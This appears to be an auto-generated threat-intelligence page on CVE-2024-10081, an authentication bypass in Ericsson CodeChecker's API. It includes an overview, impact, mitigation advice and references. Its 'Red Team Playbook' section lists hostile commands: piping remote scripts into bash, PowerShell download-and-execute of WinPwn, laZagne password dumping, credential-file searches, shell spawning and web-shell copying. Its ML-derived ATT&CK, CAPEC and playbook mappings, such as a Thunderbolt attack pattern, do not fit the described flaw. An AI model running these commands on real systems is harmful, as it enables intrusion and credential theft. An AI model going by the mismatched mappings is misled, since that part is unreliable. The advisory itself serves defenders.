CVE-2024-10081
Overview
This vulnerability is an authentication bypass affecting Ericsson CodeChecker versions up to 6.24.1. The root cause lies in improper access control on the API endpoints, specifically when the API URL ends with /Authentication. This flaw allows unauthorized access to all API endpoints except the /Authentication endpoint itself, compromising the authentication mechanism of the product.
Vulnerability Description
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Authentication bypass occurs when the API URL ends with Authentication. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others. All endpoints, apart from the /Authentication is affected by the vulnerability. This issue affects CodeChecker: through 6.24.1.
Impact
An attacker with network access can bypass authentication controls without any credentials or user interaction, gaining superuser access to the CodeChecker API endpoints. This enables unauthorized modification of critical data such as product configurations and defect records, potentially leading to data integrity compromise and unauthorized administrative control. The vulnerability's CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N) confirms remote exploitability with no privileges or user interaction required, resulting in complete confidentiality and integrity loss.
Solution
Ericsson has addressed this vulnerability in CodeChecker versions beyond 6.24.1. Users should upgrade to the latest patched release as detailed in the vendor advisory GHSA-f3f8-vx3w-hp5q available on the official GitHub repository. The advisory provides specific patch instructions and recommends immediate application of updates to remediate the authentication bypass. No alternative workarounds are provided; upgrading to the fixed version is the prescribed mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in CodeChecker arises from an authentication bypass that occurs when the API URL is improperly configured to end with the term "Authentication." This flaw allows unauthorized users to gain superuser access to all API endpoints except for the Authentication endpoint itself. As a result, attackers can exploit this vulnerability to perform a wide range of administrative actions, including adding, editing, or removing products from the system. The flaw is particularly concerning because it affects all versions of CodeChecker up to and including 6.24.1, creating a significant window of opportunity for malicious actors to exploit the weakness.
Attack vectors for this vulnerability are straightforward due to the nature of the API design. An attacker can easily craft a request to the API, bypassing the authentication mechanism by simply manipulating the URL. For instance, if an attacker knows or can guess the API structure, they can directly access endpoints that should be protected, gaining unauthorized control over critical functionalities. Exploitation scenarios could include an attacker adding malicious products to the database, altering existing product information to mislead users, or even removing essential products, thereby disrupting business operations. The ease of exploitation combined with the high level of access granted makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be severe, especially for organizations relying on CodeChecker for their software development and quality assurance processes. Unauthorized access to administrative functions can lead to data integrity issues, loss of sensitive information, and significant disruptions in the development lifecycle. Businesses may face reputational damage, legal ramifications, and financial losses due to compromised data or service outages. Moreover, the high CVSS score of 10.0 indicates that this vulnerability poses a critical risk, necessitating immediate attention from affected organizations to mitigate potential fallout.
Detection of this vulnerability can be challenging, as it may not leave obvious traces in system logs or alerts. Organizations should implement robust logging mechanisms to monitor API access patterns and identify any unauthorized attempts to access administrative endpoints. Regular security audits and code reviews can also help in identifying misconfigurations that lead to such vulnerabilities. Automated tools that scan for known vulnerabilities in API configurations can provide an additional layer of defense.
To mitigate the risks associated with this vulnerability, organizations should prioritize patching affected versions of CodeChecker and ensure that their API endpoints are correctly secured. Implementing strict access controls and authentication mechanisms for all API endpoints is essential. Additionally, employing rate limiting and anomaly detection can help in identifying and thwarting potential exploitation attempts. Educating developers about secure coding practices and the importance of proper API design can further reduce the likelihood of similar vulnerabilities arising in the future. Overall, a proactive approach to security, combined with timely updates and vigilant monitoring, is crucial in safeguarding against this significant threat.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-10081, with telemetry indicating a modest rise in attempts to leverage the authentication bypass vulnerability in Ericsson CodeChecker. Despite this uptick, the Exploit Prediction Scoring System (EPSS) score has notably declined, reflecting a reduced likelihood of widespread exploitation in the near term. This divergence suggests that while adversaries continue probing the vulnerability, successful exploitation remains limited or less attractive compared to other emerging threats. No new exploit techniques or proof-of-concept code have been observed, indicating that threat actors have not significantly advanced their capabilities against this flaw. For defenders, this nuanced shift underscores the importance of maintaining vigilance without escalating immediate alarm; the vulnerability remains critical, but the current exploitation momentum appears subdued. Consequently, the overall threat level is stable with a slight downward trend in exploitation risk, though continued monitoring is essential given the vulnerability’s high severity and potential impact.
Update 2 — July 08, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2024-10081, indicating a modest resurgence in attempts to exploit the authentication bypass vulnerability in Ericsson CodeChecker. While the overall exploitation momentum remains relatively stable, this subtle uptick suggests that threat actors continue to probe and potentially leverage this critical flaw to gain unauthorized superuser access. The persistence of activity, despite no new exploit techniques or proof-of-concept code emerging, underscores the vulnerability’s ongoing attractiveness as a target within attacker campaigns. For defenders, this development highlights the necessity of sustained monitoring and vigilance, as even marginal increases in exploitation attempts can presage broader adversary interest or preparatory actions for more aggressive campaigns. Consequently, the threat level remains critical but stable, with a cautious eye warranted toward any further escalation in exploitation trends.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ericsson | Codechecker | All |
cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
30 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10081 |
| github.com |
GitHub CVE
vendor-advisory
|
https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q |